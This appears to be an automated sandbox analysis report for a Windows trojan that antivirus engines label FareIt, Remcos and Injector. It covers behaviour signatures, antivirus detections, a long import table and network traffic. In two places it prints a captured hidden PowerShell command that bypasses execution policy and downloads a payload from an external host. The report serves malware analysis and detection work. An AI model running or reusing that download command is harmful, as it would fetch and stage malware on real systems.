cmdline powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command tas;(new-object System.Net.WebClient).DownloadFile('https://share.dmca.gripe/RSlUa63cBf5DkEfs','C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\23867decc4f3176a9541bd62ec495')
Drops a binary and executes it (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\name.bat
A process created a hidden window (2 个事件)
Time & API Arguments Status Return Repeated
1619269230.991633
ShellExecuteExW
parameters:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\name.bat
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\name.bat
show_type: 0
success 1 0
1619301871.844374
CreateProcessInternalW
thread_identifier: 2456
thread_handle: 0x00000084
process_identifier: 520
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command tas;(new-object System.Net.WebClient).DownloadFile('https://share.dmca.gripe/RSlUa63cBf5DkEfs','C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\23867decc4f3176a9541bd62ec495')
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x00000080
inherit_handles: 1
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619301880.156999
GetAdaptersAddresses
flags: 15
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (1 个事件)
entropy 7.866997886945607 section {'size_of_data': '0x00018a00', 'virtual_address': '0x000ac000', 'entropy': 7.866997886945607, 'name': 'DATA', 'virtual_size': '0x0001881c'} description A section with a high entropy has been found
URL downloaded by powershell script (2 个事件)
Data received 
Data received F
Poweshell is sending data to a remote host (2 个事件)
Data sent so`„%{.¶¨EÏþô{EW³¯æ5 E]n7.Á!娺Í/5 ÀÀÀ À 28.ÿshare.dmca.gripe  
Data sent so`„%}6Zî ¢•ö³!D]…IŽøPÂù-¾?̟/5 ÀÀÀ À 28.ÿshare.dmca.gripe  
Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 个事件)
Time & API Arguments Status Return Repeated
1619301875.859999
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
网络通信
Communicates with host for which no DNS query was performed (3 个事件)
host 104.21.6.87
host 172.217.24.14
host 222.216.123.6
Deletes executed files from disk (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\name.bat
Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 个事件)
Time & API Arguments Status Return Repeated
1619301883.281999
send
buffer: so`„%{.¶¨EÏþô{EW³¯æ5 E]n7.Á!娺Í/5 ÀÀÀ À 28.ÿshare.dmca.gripe  
socket: 1376
sent: 120
success 120 0
1619301885.296999
send
buffer: so`„%}6Zî ¢•ö³!D]…IŽøPÂù-¾?̟/5 ÀÀÀ À 28.ÿshare.dmca.gripe  
socket: 1376
sent: 120
success 120 0
Creates a suspicious Powershell process (3 个事件)
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
value Uses powershell to execute a file download from the command line
Generates some ICMP traffic
File has been identified by 52 AntiVirus engines on VirusTotal as malicious (50 out of 52 个事件)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.Delf.FareIt.Gen.13
ALYac Trojan.Delf.FareIt.Gen.13
Cylance Unsafe
Sangfor Malware
K7AntiVirus Trojan ( 0055e7d01 )
Alibaba Trojan:Win32/Injector.9d9b71b5
K7GW Trojan ( 0055e7d01 )
Cybereason malicious.cc4f31
Arcabit Trojan.Delf.FareIt.Gen.13
Cyren W32/Injector.TQYQ-5604
Symantec ML.Attribute.HighConfidence
APEX Malicious
Avast Win32:Inject-XW [Trj]
BitDefender Trojan.Delf.FareIt.Gen.13
NANO-Antivirus Trojan.Win32.Buzus.gtcbnv
Paloalto generic.ml
Rising Trojan.Kryptik!1.C56D (CLASSIC)
Ad-Aware Trojan.Delf.FareIt.Gen.13
Emsisoft Trojan.Delf.FareIt.Gen.13 (B)
Comodo Malware@#sf2xnd9as17x
F-Secure Heuristic.HEUR/AGEN.1105001
DrWeb Trojan.DownLoader32.45107
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R06EC0PIA20
McAfee-GW-Edition BehavesLike.Win32.Fareit.dh
FireEye Trojan.Delf.FareIt.Gen.13
Sophos Mal/Generic-S
Ikarus Trojan.Win32.Injector
Avira HEUR/AGEN.1105001
MAX malware (ai score=89)
Antiy-AVL Trojan/Win32.Sonbokli
Microsoft Trojan:Win32/RemcosCrypt.ACH!MTB
AegisLab Trojan.Win32.Generic.4!c
GData Win32.Trojan.Buzus.C
Cynet Malicious (score: 85)
AhnLab-V3 Malware/Win32.Generic.C3971808
McAfee Fareit-FRD!23867DECC4F3
VBA32 TScope.Trojan.Delf
Malwarebytes Backdoor.Remcos
Zoner Trojan.Win32.87797
ESET-NOD32 a variant of Win32/Injector.EJUL
TrendMicro-HouseCall TROJ_GEN.R06EC0PIA20
Tencent Win32.Trojan.Generic.Hqbu
MaxSecure Trojan.Malware.74813238.susgen
Fortinet W32/Injector.EKCN!tr
BitDefenderTheta Gen:NN.ZelphiF.34700.5GW@a0cwkUni
AVG Win32:Inject-XW [Trj]
Panda Trj/GdSda.A
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

1992-06-20 06:22:17

Imports

Library kernel32.dll:
0x4c61a0 VirtualFree
0x4c61a4 VirtualAlloc
0x4c61a8 LocalFree
0x4c61ac LocalAlloc
0x4c61b0 GetVersion
0x4c61b4 GetCurrentThreadId
0x4c61c0 VirtualQuery
0x4c61c4 WideCharToMultiByte
0x4c61c8 MultiByteToWideChar
0x4c61cc lstrlenA
0x4c61d0 lstrcpynA
0x4c61d4 LoadLibraryExA
0x4c61d8 GetThreadLocale
0x4c61dc GetStartupInfoA
0x4c61e0 GetProcAddress
0x4c61e4 GetModuleHandleA
0x4c61e8 GetModuleFileNameA
0x4c61ec GetLocaleInfoA
0x4c61f0 GetCommandLineA
0x4c61f4 FreeLibrary
0x4c61f8 FindFirstFileA
0x4c61fc FindClose
0x4c6200 ExitProcess
0x4c6204 WriteFile
0x4c620c RtlUnwind
0x4c6210 RaiseException
0x4c6214 GetStdHandle
Library user32.dll:
0x4c621c GetKeyboardType
0x4c6220 LoadStringA
0x4c6224 MessageBoxA
0x4c6228 CharNextA
Library advapi32.dll:
0x4c6230 RegQueryValueExA
0x4c6234 RegOpenKeyExA
0x4c6238 RegCloseKey
Library oleaut32.dll:
0x4c6240 SysFreeString
0x4c6244 SysReAllocStringLen
0x4c6248 SysAllocStringLen
Library kernel32.dll:
0x4c6250 TlsSetValue
0x4c6254 TlsGetValue
0x4c6258 LocalAlloc
0x4c625c GetModuleHandleA
Library advapi32.dll:
0x4c6264 RegQueryValueExA
0x4c6268 RegOpenKeyExA
0x4c626c RegCloseKey
Library kernel32.dll:
0x4c6274 lstrcpyA
0x4c6278 WriteFile
0x4c627c WaitForSingleObject
0x4c6280 VirtualQuery
0x4c6284 VirtualProtect
0x4c6288 VirtualAlloc
0x4c628c Sleep
0x4c6290 SizeofResource
0x4c6294 SetThreadLocale
0x4c6298 SetFilePointer
0x4c629c SetFileAttributesA
0x4c62a0 SetEvent
0x4c62a4 SetErrorMode
0x4c62a8 SetEndOfFile
0x4c62ac ResetEvent
0x4c62b0 ReadFile
0x4c62b4 MultiByteToWideChar
0x4c62b8 MulDiv
0x4c62bc LockResource
0x4c62c0 LoadResource
0x4c62c4 LoadLibraryA
0x4c62d0 GlobalUnlock
0x4c62d4 GlobalReAlloc
0x4c62d8 GlobalHandle
0x4c62dc GlobalLock
0x4c62e0 GlobalFree
0x4c62e4 GlobalFindAtomA
0x4c62e8 GlobalDeleteAtom
0x4c62ec GlobalAlloc
0x4c62f0 GlobalAddAtomA
0x4c62f4 GetVersionExA
0x4c62f8 GetVersion
0x4c62fc GetTickCount
0x4c6300 GetThreadLocale
0x4c6304 GetSystemInfo
0x4c6308 GetStringTypeExA
0x4c630c GetStdHandle
0x4c6310 GetProcAddress
0x4c6314 GetModuleHandleA
0x4c6318 GetModuleFileNameA
0x4c631c GetLocaleInfoA
0x4c6320 GetLocalTime
0x4c6324 GetLastError
0x4c6328 GetFullPathNameA
0x4c632c GetFileAttributesA
0x4c6334 GetDiskFreeSpaceA
0x4c6338 GetDateFormatA
0x4c633c GetCurrentThreadId
0x4c6340 GetCurrentProcessId
0x4c6344 GetComputerNameA
0x4c6348 GetCPInfo
0x4c634c GetACP
0x4c6350 FreeResource
0x4c6354 InterlockedExchange
0x4c6358 FreeLibrary
0x4c635c FormatMessageA
0x4c6360 FindResourceA
0x4c6364 FindFirstFileA
0x4c6368 FindClose
0x4c6374 EnumCalendarInfoA
0x4c637c DeleteFileA
0x4c6384 CreateThread
0x4c6388 CreateFileA
0x4c638c CreateEventA
0x4c6390 CompareStringA
0x4c6394 CloseHandle
Library version.dll:
0x4c639c VerQueryValueA
0x4c63a4 GetFileVersionInfoA
Library gdi32.dll:
0x4c63ac UnrealizeObject
0x4c63b0 StretchBlt
0x4c63b4 SetWindowOrgEx
0x4c63b8 SetWindowExtEx
0x4c63bc SetWinMetaFileBits
0x4c63c0 SetViewportOrgEx
0x4c63c4 SetViewportExtEx
0x4c63c8 SetTextColor
0x4c63cc SetStretchBltMode
0x4c63d0 SetROP2
0x4c63d4 SetPixel
0x4c63d8 SetMapMode
0x4c63dc SetEnhMetaFileBits
0x4c63e0 SetDIBColorTable
0x4c63e4 SetBrushOrgEx
0x4c63e8 SetBkMode
0x4c63ec SetBkColor
0x4c63f0 SelectPalette
0x4c63f4 SelectObject
0x4c63f8 SelectClipRgn
0x4c63fc SaveDC
0x4c6400 RestoreDC
0x4c6404 Rectangle
0x4c6408 RectVisible
0x4c640c RealizePalette
0x4c6410 Polyline
0x4c6414 Polygon
0x4c6418 PolyPolyline
0x4c641c PlayEnhMetaFile
0x4c6420 PatBlt
0x4c6424 MoveToEx
0x4c6428 MaskBlt
0x4c642c LineTo
0x4c6430 IntersectClipRect
0x4c6434 GetWindowOrgEx
0x4c6438 GetWinMetaFileBits
0x4c643c GetTextMetricsA
0x4c6440 GetTextExtentPointA
0x4c644c GetStockObject
0x4c6450 GetPixel
0x4c6454 GetPaletteEntries
0x4c6458 GetObjectA
0x4c6464 GetEnhMetaFileBits
0x4c6468 GetDeviceCaps
0x4c646c GetDIBits
0x4c6470 GetDIBColorTable
0x4c6474 GetDCOrgEx
0x4c647c GetClipBox
0x4c6480 GetBrushOrgEx
0x4c6484 GetBitmapBits
0x4c6488 GdiFlush
0x4c648c ExtTextOutA
0x4c6490 ExtCreatePen
0x4c6494 ExcludeClipRect
0x4c6498 DeleteObject
0x4c649c DeleteEnhMetaFile
0x4c64a0 DeleteDC
0x4c64a4 CreateSolidBrush
0x4c64a8 CreatePenIndirect
0x4c64ac CreatePalette
0x4c64b4 CreateFontIndirectA
0x4c64b8 CreateDIBitmap
0x4c64bc CreateDIBSection
0x4c64c0 CreateCompatibleDC
0x4c64c8 CreateBrushIndirect
0x4c64cc CreateBitmap
0x4c64d0 CopyEnhMetaFileA
0x4c64d4 BitBlt
Library user32.dll:
0x4c64dc CreateWindowExA
0x4c64e0 WindowFromPoint
0x4c64e4 WinHelpA
0x4c64e8 WaitMessage
0x4c64ec ValidateRect
0x4c64f0 UpdateWindow
0x4c64f4 UnregisterClassA
0x4c64f8 UnionRect
0x4c64fc UnhookWindowsHookEx
0x4c6500 TranslateMessage
0x4c6508 TrackPopupMenu
0x4c6510 ShowWindow
0x4c6514 ShowScrollBar
0x4c6518 ShowOwnedPopups
0x4c651c ShowCursor
0x4c6520 ShowCaret
0x4c6524 SetWindowsHookExA
0x4c6528 SetWindowTextA
0x4c652c SetWindowPos
0x4c6530 SetWindowPlacement
0x4c6534 SetWindowLongA
0x4c6538 SetTimer
0x4c653c SetScrollRange
0x4c6540 SetScrollPos
0x4c6544 SetScrollInfo
0x4c6548 SetRect
0x4c654c SetPropA
0x4c6550 SetParent
0x4c6554 SetMenuItemInfoA
0x4c6558 SetMenu
0x4c655c SetKeyboardState
0x4c6560 SetForegroundWindow
0x4c6564 SetFocus
0x4c6568 SetCursor
0x4c656c SetClipboardData
0x4c6570 SetClassLongA
0x4c6574 SetCapture
0x4c6578 SetActiveWindow
0x4c657c SendMessageA
0x4c6580 ScrollWindowEx
0x4c6584 ScrollWindow
0x4c6588 ScreenToClient
0x4c658c RemovePropA
0x4c6590 RemoveMenu
0x4c6594 ReleaseDC
0x4c6598 ReleaseCapture
0x4c65a4 RegisterClassA
0x4c65a8 RedrawWindow
0x4c65ac PtInRect
0x4c65b0 PostQuitMessage
0x4c65b4 PostMessageA
0x4c65b8 PeekMessageA
0x4c65bc OpenClipboard
0x4c65c0 OffsetRect
0x4c65c4 OemToCharA
0x4c65c8 MessageBoxA
0x4c65cc MessageBeep
0x4c65d0 MapWindowPoints
0x4c65d4 MapVirtualKeyA
0x4c65d8 LoadStringA
0x4c65dc LoadKeyboardLayoutA
0x4c65e0 LoadIconA
0x4c65e4 LoadCursorA
0x4c65e8 LoadBitmapA
0x4c65ec KillTimer
0x4c65f0 IsZoomed
0x4c65f4 IsWindowVisible
0x4c65f8 IsWindowEnabled
0x4c65fc IsWindow
0x4c6600 IsRectEmpty
0x4c6604 IsIconic
0x4c6608 IsDialogMessageA
0x4c660c IsChild
0x4c6610 IsCharAlphaNumericA
0x4c6614 IsCharAlphaA
0x4c6618 InvalidateRect
0x4c661c IntersectRect
0x4c6620 InsertMenuItemA
0x4c6624 InsertMenuA
0x4c6628 InflateRect
0x4c662c HideCaret
0x4c6634 GetWindowTextA
0x4c6638 GetWindowRect
0x4c663c GetWindowPlacement
0x4c6640 GetWindowLongA
0x4c6644 GetWindowDC
0x4c6648 GetTopWindow
0x4c664c GetSystemMetrics
0x4c6650 GetSystemMenu
0x4c6654 GetSysColorBrush
0x4c6658 GetSysColor
0x4c665c GetSubMenu
0x4c6660 GetScrollRange
0x4c6664 GetScrollPos
0x4c6668 GetScrollInfo
0x4c666c GetPropA
0x4c6670 GetParent
0x4c6674 GetWindow
0x4c6678 GetMessageTime
0x4c667c GetMenuStringA
0x4c6680 GetMenuState
0x4c6684 GetMenuItemInfoA
0x4c6688 GetMenuItemID
0x4c668c GetMenuItemCount
0x4c6690 GetMenu
0x4c6694 GetLastActivePopup
0x4c6698 GetKeyboardState
0x4c66a0 GetKeyboardLayout
0x4c66a4 GetKeyState
0x4c66a8 GetKeyNameTextA
0x4c66ac GetIconInfo
0x4c66b0 GetForegroundWindow
0x4c66b4 GetFocus
0x4c66b8 GetDoubleClickTime
0x4c66bc GetDlgItem
0x4c66c0 GetDesktopWindow
0x4c66c4 GetDCEx
0x4c66c8 GetDC
0x4c66cc GetCursorPos
0x4c66d0 GetCursor
0x4c66d4 GetClipboardData
0x4c66d8 GetClientRect
0x4c66dc GetClassNameA
0x4c66e0 GetClassInfoA
0x4c66e4 GetCaretPos
0x4c66e8 GetCapture
0x4c66ec GetActiveWindow
0x4c66f0 FrameRect
0x4c66f4 FindWindowA
0x4c66f8 FillRect
0x4c66fc EqualRect
0x4c6700 EnumWindows
0x4c6704 EnumThreadWindows
0x4c670c EndPaint
0x4c6710 EndDeferWindowPos
0x4c6714 EnableWindow
0x4c6718 EnableScrollBar
0x4c671c EnableMenuItem
0x4c6720 EmptyClipboard
0x4c6724 DrawTextA
0x4c6728 DrawStateA
0x4c672c DrawMenuBar
0x4c6730 DrawIconEx
0x4c6734 DrawIcon
0x4c6738 DrawFrameControl
0x4c673c DrawFocusRect
0x4c6740 DrawEdge
0x4c6744 DispatchMessageA
0x4c6748 DestroyWindow
0x4c674c DestroyMenu
0x4c6750 DestroyIcon
0x4c6754 DestroyCursor
0x4c6758 DeleteMenu
0x4c675c DeferWindowPos
0x4c6760 DefWindowProcA
0x4c6764 DefMDIChildProcA
0x4c6768 DefFrameProcA
0x4c676c CreatePopupMenu
0x4c6770 CreateMenu
0x4c6774 CreateIcon
0x4c6778 CloseClipboard
0x4c677c ClientToScreen
0x4c6780 CheckMenuItem
0x4c6784 CallWindowProcA
0x4c6788 CallNextHookEx
0x4c678c BeginPaint
0x4c6790 BeginDeferWindowPos
0x4c6794 CharNextA
0x4c6798 CharLowerBuffA
0x4c679c CharLowerA
0x4c67a0 CharUpperBuffA
0x4c67a4 CharToOemA
0x4c67a8 AdjustWindowRectEx
Library kernel32.dll:
0x4c67b4 Sleep
Library oleaut32.dll:
0x4c67bc SafeArrayPtrOfIndex
0x4c67c0 SafeArrayPutElement
0x4c67c4 SafeArrayGetElement
0x4c67cc SafeArrayAccessData
0x4c67d0 SafeArrayGetUBound
0x4c67d4 SafeArrayGetLBound
0x4c67d8 SafeArrayCreate
0x4c67dc VariantChangeType
0x4c67e0 VariantCopyInd
0x4c67e4 VariantCopy
0x4c67e8 VariantClear
0x4c67ec VariantInit
Library ole32.dll:
0x4c67f4 CoTaskMemFree
0x4c67f8 ProgIDFromCLSID
0x4c67fc StringFromCLSID
0x4c6800 CoCreateInstance
0x4c6804 CoUninitialize
0x4c6808 CoInitialize
0x4c680c IsEqualGUID
Library oleaut32.dll:
0x4c6814 GetErrorInfo
0x4c6818 GetActiveObject
0x4c681c SysFreeString
Library comctl32.dll:
0x4c682c ImageList_Write
0x4c6830 ImageList_Read
0x4c6840 ImageList_DragMove
0x4c6844 ImageList_DragLeave
0x4c6848 ImageList_DragEnter
0x4c684c ImageList_EndDrag
0x4c6850 ImageList_BeginDrag
0x4c6854 ImageList_Remove
0x4c6858 ImageList_DrawEx
0x4c685c ImageList_Replace
0x4c6860 ImageList_Draw
0x4c6870 ImageList_Add
0x4c687c ImageList_Destroy
0x4c6880 ImageList_Create
Library shell32.dll:
0x4c6888 ShellExecuteA
Library comdlg32.dll:
0x4c6890 GetOpenFileNameA
Library winmm.dll:
0x4c6898 sndPlaySoundA
Library kernel32.dll:
0x4c68a0 MulDiv

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
104.21.6.87 443 192.168.56.101 49204
192.168.56.101 49181 195.133.192.17 share.dmca.gripe 443
192.168.56.101 49182 195.133.192.17 share.dmca.gripe 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 53657 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50535 239.255.255.250 3702
192.168.56.101 50537 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.